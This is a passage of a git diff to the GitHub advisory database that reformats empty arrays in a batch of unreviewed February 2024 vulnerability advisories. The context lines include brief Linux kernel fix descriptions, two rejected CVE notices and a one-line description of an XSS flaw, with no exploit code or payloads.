index 81961002142..8f032a374b8 100644
--- a/advisories/unreviewed/2024/02/GHSA-4926-px5g-wrp7/GHSA-4926-px5g-wrp7.json
+++ b/advisories/unreviewed/2024/02/GHSA-4926-px5g-wrp7/GHSA-4926-px5g-wrp7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-4m72-473m-w7q8/GHSA-4m72-473m-w7q8.json b/advisories/unreviewed/2024/02/GHSA-4m72-473m-w7q8/GHSA-4m72-473m-w7q8.json
index 09ef5011e87..be70bde9bae 100644
--- a/advisories/unreviewed/2024/02/GHSA-4m72-473m-w7q8/GHSA-4m72-473m-w7q8.json
+++ b/advisories/unreviewed/2024/02/GHSA-4m72-473m-w7q8/GHSA-4m72-473m-w7q8.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-4mgv-g5j9-fr8q/GHSA-4mgv-g5j9-fr8q.json b/advisories/unreviewed/2024/02/GHSA-4mgv-g5j9-fr8q/GHSA-4mgv-g5j9-fr8q.json
index 2d3a12afcb3..560fd3f0c80 100644
--- a/advisories/unreviewed/2024/02/GHSA-4mgv-g5j9-fr8q/GHSA-4mgv-g5j9-fr8q.json
+++ b/advisories/unreviewed/2024/02/GHSA-4mgv-g5j9-fr8q/GHSA-4mgv-g5j9-fr8q.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-4mvh-rcqj-42gx/GHSA-4mvh-rcqj-42gx.json b/advisories/unreviewed/2024/02/GHSA-4mvh-rcqj-42gx/GHSA-4mvh-rcqj-42gx.json
index 7f41f6fddf6..605d233d446 100644
--- a/advisories/unreviewed/2024/02/GHSA-4mvh-rcqj-42gx/GHSA-4mvh-rcqj-42gx.json
+++ b/advisories/unreviewed/2024/02/GHSA-4mvh-rcqj-42gx/GHSA-4mvh-rcqj-42gx.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -43,9 +41,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-4v5r-p2wq-3j8j/GHSA-4v5r-p2wq-3j8j.json b/advisories/unreviewed/2024/02/GHSA-4v5r-p2wq-3j8j/GHSA-4v5r-p2wq-3j8j.json
index 9cb8118ed95..d14972cd271 100644
--- a/advisories/unreviewed/2024/02/GHSA-4v5r-p2wq-3j8j/GHSA-4v5r-p2wq-3j8j.json
+++ b/advisories/unreviewed/2024/02/GHSA-4v5r-p2wq-3j8j/GHSA-4v5r-p2wq-3j8j.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-4w44-487m-rjmx/GHSA-4w44-487m-rjmx.json b/advisories/unreviewed/2024/02/GHSA-4w44-487m-rjmx/GHSA-4w44-487m-rjmx.json
index 38ce57f3d74..695da52531d 100644
--- a/advisories/unreviewed/2024/02/GHSA-4w44-487m-rjmx/GHSA-4w44-487m-rjmx.json
+++ b/advisories/unreviewed/2024/02/GHSA-4w44-487m-rjmx/GHSA-4w44-487m-rjmx.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-5355-6wp2-29w4/GHSA-5355-6wp2-29w4.json b/advisories/unreviewed/2024/02/GHSA-5355-6wp2-29w4/GHSA-5355-6wp2-29w4.json
index 157778241cb..2940578536a 100644
--- a/advisories/unreviewed/2024/02/GHSA-5355-6wp2-29w4/GHSA-5355-6wp2-29w4.json
+++ b/advisories/unreviewed/2024/02/GHSA-5355-6wp2-29w4/GHSA-5355-6wp2-29w4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-548x-j6x6-hcv4/GHSA-548x-j6x6-hcv4.json b/advisories/unreviewed/2024/02/GHSA-548x-j6x6-hcv4/GHSA-548x-j6x6-hcv4.json
index 67ede4faf3d..6c8c1ea8bd4 100644
--- a/advisories/unreviewed/2024/02/GHSA-548x-j6x6-hcv4/GHSA-548x-j6x6-hcv4.json
+++ b/advisories/unreviewed/2024/02/GHSA-548x-j6x6-hcv4/GHSA-548x-j6x6-hcv4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-5566-x4r3-96jr/GHSA-5566-x4r3-96jr.json b/advisories/unreviewed/2024/02/GHSA-5566-x4r3-96jr/GHSA-5566-x4r3-96jr.json
index bbb347172c1..8e6f0abb01f 100644
--- a/advisories/unreviewed/2024/02/GHSA-5566-x4r3-96jr/GHSA-5566-x4r3-96jr.json
+++ b/advisories/unreviewed/2024/02/GHSA-5566-x4r3-96jr/GHSA-5566-x4r3-96jr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-5v8x-xh64-m4xp/GHSA-5v8x-xh64-m4xp.json b/advisories/unreviewed/2024/02/GHSA-5v8x-xh64-m4xp/GHSA-5v8x-xh64-m4xp.json
index 14811b067a8..b26a455a02e 100644
--- a/advisories/unreviewed/2024/02/GHSA-5v8x-xh64-m4xp/GHSA-5v8x-xh64-m4xp.json
+++ b/advisories/unreviewed/2024/02/GHSA-5v8x-xh64-m4xp/GHSA-5v8x-xh64-m4xp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-6699-4qcw-gf5x/GHSA-6699-4qcw-gf5x.json b/advisories/unreviewed/2024/02/GHSA-6699-4qcw-gf5x/GHSA-6699-4qcw-gf5x.json
index bac251002af..b85a6b6baef 100644
--- a/advisories/unreviewed/2024/02/GHSA-6699-4qcw-gf5x/GHSA-6699-4qcw-gf5x.json
+++ b/advisories/unreviewed/2024/02/GHSA-6699-4qcw-gf5x/GHSA-6699-4qcw-gf5x.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-68qx-6vr4-qq4p/GHSA-68qx-6vr4-qq4p.json b/advisories/unreviewed/2024/02/GHSA-68qx-6vr4-qq4p/GHSA-68qx-6vr4-qq4p.json
index f583671ea6d..1b4b66f0690 100644
--- a/advisories/unreviewed/2024/02/GHSA-68qx-6vr4-qq4p/GHSA-68qx-6vr4-qq4p.json
+++ b/advisories/unreviewed/2024/02/GHSA-68qx-6vr4-qq4p/GHSA-68qx-6vr4-qq4p.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-6989-vr9p-xx57/GHSA-6989-vr9p-xx57.json b/advisories/unreviewed/2024/02/GHSA-6989-vr9p-xx57/GHSA-6989-vr9p-xx57.json
index 5db7b1aa2d0..ef63856c148 100644
--- a/advisories/unreviewed/2024/02/GHSA-6989-vr9p-xx57/GHSA-6989-vr9p-xx57.json
+++ b/advisories/unreviewed/2024/02/GHSA-6989-vr9p-xx57/GHSA-6989-vr9p-xx57.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-69cq-jw85-57p8/GHSA-69cq-jw85-57p8.json b/advisories/unreviewed/2024/02/GHSA-69cq-jw85-57p8/GHSA-69cq-jw85-57p8.json
index adbe67bab6f..e3d23227243 100644
--- a/advisories/unreviewed/2024/02/GHSA-69cq-jw85-57p8/GHSA-69cq-jw85-57p8.json
+++ b/advisories/unreviewed/2024/02/GHSA-69cq-jw85-57p8/GHSA-69cq-jw85-57p8.json
@@ -7,12 +7,8 @@
"CVE-2023-52485"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Wake DMCUB before sending a command\n\n[Why]\nWe can hang in place trying to send commands when the DMCUB isn't\npowered on.\n\n[How]\nFor functions that execute within a DC context or DC lock we can\nwrap the direct calls to dm_execute_dmub_cmd/list with code that\nexits idle power optimizations and reallows once we're done with\nthe command submission on success.\n\nFor DM direct submissions the DM will need to manage the enter/exit\nsequencing manually.\n\nWe cannot invoke a DMCUB command directly within the DM execution\nhelper or we can deadlock.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -28,9 +24,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-6grj-8439-x6c5/GHSA-6grj-8439-x6c5.json b/advisories/unreviewed/2024/02/GHSA-6grj-8439-x6c5/GHSA-6grj-8439-x6c5.json
index 1a834285d1a..f8dc49826b5 100644
--- a/advisories/unreviewed/2024/02/GHSA-6grj-8439-x6c5/GHSA-6grj-8439-x6c5.json
+++ b/advisories/unreviewed/2024/02/GHSA-6grj-8439-x6c5/GHSA-6grj-8439-x6c5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-6h6q-fm45-w3hv/GHSA-6h6q-fm45-w3hv.json b/advisories/unreviewed/2024/02/GHSA-6h6q-fm45-w3hv/GHSA-6h6q-fm45-w3hv.json
index b582e3b3190..156a79e7e68 100644
--- a/advisories/unreviewed/2024/02/GHSA-6h6q-fm45-w3hv/GHSA-6h6q-fm45-w3hv.json
+++ b/advisories/unreviewed/2024/02/GHSA-6h6q-fm45-w3hv/GHSA-6h6q-fm45-w3hv.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-6q4q-mhg5-v6xh/GHSA-6q4q-mhg5-v6xh.json b/advisories/unreviewed/2024/02/GHSA-6q4q-mhg5-v6xh/GHSA-6q4q-mhg5-v6xh.json
index b1418f5ebf1..1256903a288 100644
--- a/advisories/unreviewed/2024/02/GHSA-6q4q-mhg5-v6xh/GHSA-6q4q-mhg5-v6xh.json
+++ b/advisories/unreviewed/2024/02/GHSA-6q4q-mhg5-v6xh/GHSA-6q4q-mhg5-v6xh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:P/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-6rj2-w8v9-xrxq/GHSA-6rj2-w8v9-xrxq.json b/advisories/unreviewed/2024/02/GHSA-6rj2-w8v9-xrxq/GHSA-6rj2-w8v9-xrxq.json
index 08cfc57122c..43c58b5ffe3 100644
--- a/advisories/unreviewed/2024/02/GHSA-6rj2-w8v9-xrxq/GHSA-6rj2-w8v9-xrxq.json
+++ b/advisories/unreviewed/2024/02/GHSA-6rj2-w8v9-xrxq/GHSA-6rj2-w8v9-xrxq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-6vr7-4hpq-76r6/GHSA-6vr7-4hpq-76r6.json b/advisories/unreviewed/2024/02/GHSA-6vr7-4hpq-76r6/GHSA-6vr7-4hpq-76r6.json
index 5023693241f..838233e033d 100644
--- a/advisories/unreviewed/2024/02/GHSA-6vr7-4hpq-76r6/GHSA-6vr7-4hpq-76r6.json
+++ b/advisories/unreviewed/2024/02/GHSA-6vr7-4hpq-76r6/GHSA-6vr7-4hpq-76r6.json
@@ -7,12 +7,8 @@
"CVE-2023-52484"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu/arm-smmu-v3: Fix soft lockup triggered by arm_smmu_mm_invalidate_range\n\nWhen running an SVA case, the following soft lockup is triggered:\n--------------------------------------------------------------------\nwatchdog: BUG: soft lockup - CPU#244 stuck for 26s!\npstate: 83400009 (Nzcv daif +PAN -UAO +TCO +DIT -SSBS BTYPE=--)\npc : arm_smmu_cmdq_issue_cmdlist+0x178/0xa50\nlr : arm_smmu_cmdq_issue_cmdlist+0x150/0xa50\nsp : ffff8000d83ef290\nx29: ffff8000d83ef290 x28: 000000003b9aca00 x27: 0000000000000000\nx26: ffff8000d83ef3c0 x25: da86c0812194a0e8 x24: 0000000000000000\nx23: 0000000000000040 x22: ffff8000d83ef340 x21: ffff0000c63980c0\nx20: 0000000000000001 x19: ffff0000c6398080 x18: 0000000000000000\nx17: 0000000000000000 x16: 0000000000000000 x15: ffff3000b4a3bbb0\nx14: ffff3000b4a30888 x13: ffff3000b4a3cf60 x12: 0000000000000000\nx11: 0000000000000000 x10: 0000000000000000 x9 : ffffc08120e4d6bc\nx8 : 0000000000000000 x7 : 0000000000000000 x6 : 0000000000048cfa\nx5 : 0000000000000000 x4 : 0000000000000001 x3 : 000000000000000a\nx2 : 0000000080000000 x1 : 0000000000000000 x0 : 0000000000000001\nCall trace:\n arm_smmu_cmdq_issue_cmdlist+0x178/0xa50\n __arm_smmu_tlb_inv_range+0x118/0x254\n arm_smmu_tlb_inv_range_asid+0x6c/0x130\n arm_smmu_mm_invalidate_range+0xa0/0xa4\n __mmu_notifier_invalidate_range_end+0x88/0x120\n unmap_vmas+0x194/0x1e0\n unmap_region+0xb4/0x144\n do_mas_align_munmap+0x290/0x490\n do_mas_munmap+0xbc/0x124\n __vm_munmap+0xa8/0x19c\n __arm64_sys_munmap+0x28/0x50\n invoke_syscall+0x78/0x11c\n el0_svc_common.constprop.0+0x58/0x1c0\n do_el0_svc+0x34/0x60\n el0_svc+0x2c/0xd4\n el0t_64_sync_handler+0x114/0x140\n el0t_64_sync+0x1a4/0x1a8\n--------------------------------------------------------------------\n\nNote that since 6.6-rc1 the arm_smmu_mm_invalidate_range above is renamed\nto \"arm_smmu_mm_arch_invalidate_secondary_tlbs\", yet the problem remains.\n\nThe commit 06ff87bae8d3 (\"arm64: mm: remove unused functions and variable\nprotoypes\") fixed a similar lockup on the CPU MMU side. Yet, it can occur\nto SMMU too, since arm_smmu_mm_arch_invalidate_secondary_tlbs() is called\ntypically next to MMU tlb flush function, e.g.\n\ttlb_flush_mmu_tlbonly {\n\t\ttlb_flush {\n\t\t\t__flush_tlb_range {\n\t\t\t\t// check MAX_TLBI_OPS\n\t\t\t}\n\t\t}\n\t\tmmu_notifier_arch_invalidate_secondary_tlbs {\n\t\t\tarm_smmu_mm_arch_invalidate_secondary_tlbs {\n\t\t\t\t// does not check MAX_TLBI_OPS\n\t\t\t}\n\t\t}\n\t}\n\nClone a CMDQ_MAX_TLBI_OPS from the MAX_TLBI_OPS in tlbflush.h, since in an\nSVA case SMMU uses the CPU page table, so it makes sense to align with the\ntlbflush code. Then, replace per-page TLBI commands with a single per-asid\nTLBI command, if the request size hits this threshold.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -36,9 +32,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-745j-hgg9-cr25/GHSA-745j-hgg9-cr25.json b/advisories/unreviewed/2024/02/GHSA-745j-hgg9-cr25/GHSA-745j-hgg9-cr25.json
index 97b9b3bfe65..a20879852d6 100644
--- a/advisories/unreviewed/2024/02/GHSA-745j-hgg9-cr25/GHSA-745j-hgg9-cr25.json
+++ b/advisories/unreviewed/2024/02/GHSA-745j-hgg9-cr25/GHSA-745j-hgg9-cr25.json
@@ -7,12 +7,8 @@
"CVE-2024-24475"
],
"details": "Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -20,9 +16,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-7g7m-2p63-98g8/GHSA-7g7m-2p63-98g8.json b/advisories/unreviewed/2024/02/GHSA-7g7m-2p63-98g8/GHSA-7g7m-2p63-98g8.json
index 5660322c802..1cfae41bfc1 100644
--- a/advisories/unreviewed/2024/02/GHSA-7g7m-2p63-98g8/GHSA-7g7m-2p63-98g8.json
+++ b/advisories/unreviewed/2024/02/GHSA-7g7m-2p63-98g8/GHSA-7g7m-2p63-98g8.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -35,9 +33,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "CRITICAL",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-7jwf-rcqv-w98g/GHSA-7jwf-rcqv-w98g.json b/advisories/unreviewed/2024/02/GHSA-7jwf-rcqv-w98g/GHSA-7jwf-rcqv-w98g.json
index d31a051b363..553d51c79a5 100644
--- a/advisories/unreviewed/2024/02/GHSA-7jwf-rcqv-w98g/GHSA-7jwf-rcqv-w98g.json
+++ b/advisories/unreviewed/2024/02/GHSA-7jwf-rcqv-w98g/GHSA-7jwf-rcqv-w98g.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-7pr9-232f-3fgg/GHSA-7pr9-232f-3fgg.json b/advisories/unreviewed/2024/02/GHSA-7pr9-232f-3fgg/GHSA-7pr9-232f-3fgg.json
index c1f2ef9818f..21a79775052 100644
--- a/advisories/unreviewed/2024/02/GHSA-7pr9-232f-3fgg/GHSA-7pr9-232f-3fgg.json
+++ b/advisories/unreviewed/2024/02/GHSA-7pr9-232f-3fgg/GHSA-7pr9-232f-3fgg.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-7v7g-38mv-3237/GHSA-7v7g-38mv-3237.json b/advisories/unreviewed/2024/02/GHSA-7v7g-38mv-3237/GHSA-7v7g-38mv-3237.json
index fe0bf67b8a3..9fa77f7c22e 100644
--- a/advisories/unreviewed/2024/02/GHSA-7v7g-38mv-3237/GHSA-7v7g-38mv-3237.json
+++ b/advisories/unreviewed/2024/02/GHSA-7v7g-38mv-3237/GHSA-7v7g-38mv-3237.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-7x8g-jfhh-pqhm/GHSA-7x8g-jfhh-pqhm.json b/advisories/unreviewed/2024/02/GHSA-7x8g-jfhh-pqhm/GHSA-7x8g-jfhh-pqhm.json
index 1e476c8d3b8..b1e069c3679 100644
--- a/advisories/unreviewed/2024/02/GHSA-7x8g-jfhh-pqhm/GHSA-7x8g-jfhh-pqhm.json
+++ b/advisories/unreviewed/2024/02/GHSA-7x8g-jfhh-pqhm/GHSA-7x8g-jfhh-pqhm.json
@@ -7,12 +7,8 @@
"CVE-2024-0704"
],
"details": "Rejected reason: very low impact - impractical to correct",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -20,9 +16,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-83rv-7m8c-7qv3/GHSA-83rv-7m8c-7qv3.json b/advisories/unreviewed/2024/02/GHSA-83rv-7m8c-7qv3/GHSA-83rv-7m8c-7qv3.json
index 672de689542..debc21e08e6 100644
--- a/advisories/unreviewed/2024/02/GHSA-83rv-7m8c-7qv3/GHSA-83rv-7m8c-7qv3.json
+++ b/advisories/unreviewed/2024/02/GHSA-83rv-7m8c-7qv3/GHSA-83rv-7m8c-7qv3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-869h-qhfx-w939/GHSA-869h-qhfx-w939.json b/advisories/unreviewed/2024/02/GHSA-869h-qhfx-w939/GHSA-869h-qhfx-w939.json
index 7f6b2850a1e..7877c0059fa 100644
--- a/advisories/unreviewed/2024/02/GHSA-869h-qhfx-w939/GHSA-869h-qhfx-w939.json
+++ b/advisories/unreviewed/2024/02/GHSA-869h-qhfx-w939/GHSA-869h-qhfx-w939.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-8j45-r236-3q9q/GHSA-8j45-r236-3q9q.json b/advisories/unreviewed/2024/02/GHSA-8j45-r236-3q9q/GHSA-8j45-r236-3q9q.json
index 8588b4a5e4c..f81fecce27b 100644
--- a/advisories/unreviewed/2024/02/GHSA-8j45-r236-3q9q/GHSA-8j45-r236-3q9q.json
+++ b/advisories/unreviewed/2024/02/GHSA-8j45-r236-3q9q/GHSA-8j45-r236-3q9q.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-8w59-6xpv-7xqr/GHSA-8w59-6xpv-7xqr.json b/advisories/unreviewed/2024/02/GHSA-8w59-6xpv-7xqr/GHSA-8w59-6xpv-7xqr.json
index 159d2bb7eb6..cc9ee967738 100644
--- a/advisories/unreviewed/2024/02/GHSA-8w59-6xpv-7xqr/GHSA-8w59-6xpv-7xqr.json
+++ b/advisories/unreviewed/2024/02/GHSA-8w59-6xpv-7xqr/GHSA-8w59-6xpv-7xqr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-8xmq-whfm-pq37/GHSA-8xmq-whfm-pq37.json b/advisories/unreviewed/2024/02/GHSA-8xmq-whfm-pq37/GHSA-8xmq-whfm-pq37.json
index 98342295d17..03ad2afb3ad 100644
--- a/advisories/unreviewed/2024/02/GHSA-8xmq-whfm-pq37/GHSA-8xmq-whfm-pq37.json
+++ b/advisories/unreviewed/2024/02/GHSA-8xmq-whfm-pq37/GHSA-8xmq-whfm-pq37.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-99gp-p4g8-wrh7/GHSA-99gp-p4g8-wrh7.json b/advisories/unreviewed/2024/02/GHSA-99gp-p4g8-wrh7/GHSA-99gp-p4g8-wrh7.json
index 61ab69a3989..8db65e156c8 100644
--- a/advisories/unreviewed/2024/02/GHSA-99gp-p4g8-wrh7/GHSA-99gp-p4g8-wrh7.json
+++ b/advisories/unreviewed/2024/02/GHSA-99gp-p4g8-wrh7/GHSA-99gp-p4g8-wrh7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-9c57-j536-h7mm/GHSA-9c57-j536-h7mm.json b/advisories/unreviewed/2024/02/GHSA-9c57-j536-h7mm/GHSA-9c57-j536-h7mm.json
index 55d92582b32..a56a634c5cf 100644
--- a/advisories/unreviewed/2024/02/GHSA-9c57-j536-h7mm/GHSA-9c57-j536-h7mm.json
+++ b/advisories/unreviewed/2024/02/GHSA-9c57-j536-h7mm/GHSA-9c57-j536-h7mm.json
@@ -7,12 +7,8 @@
"CVE-2024-25292"
],
"details": "Cross-site scripting (XSS) vulnerability in RenderTune v1.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Upload Title parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-9vh6-fr62-399g/GHSA-9vh6-fr62-399g.json b/advisories/unreviewed/2024/02/GHSA-9vh6-fr62-399g/GHSA-9vh6-fr62-399g.json
index d41c8cd3b6d..86b19e816e5 100644
--- a/advisories/unreviewed/2024/02/GHSA-9vh6-fr62-399g/GHSA-9vh6-fr62-399g.json
+++ b/advisories/unreviewed/2024/02/GHSA-9vh6-fr62-399g/GHSA-9vh6-fr62-399g.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-c2qq-2j48-5pr5/GHSA-c2qq-2j48-5pr5.json b/advisories/unreviewed/2024/02/GHSA-c2qq-2j48-5pr5/GHSA-c2qq-2j48-5pr5.json
index 858aaa621ac..fcab7fd47dd 100644
--- a/advisories/unreviewed/2024/02/GHSA-c2qq-2j48-5pr5/GHSA-c2qq-2j48-5pr5.json
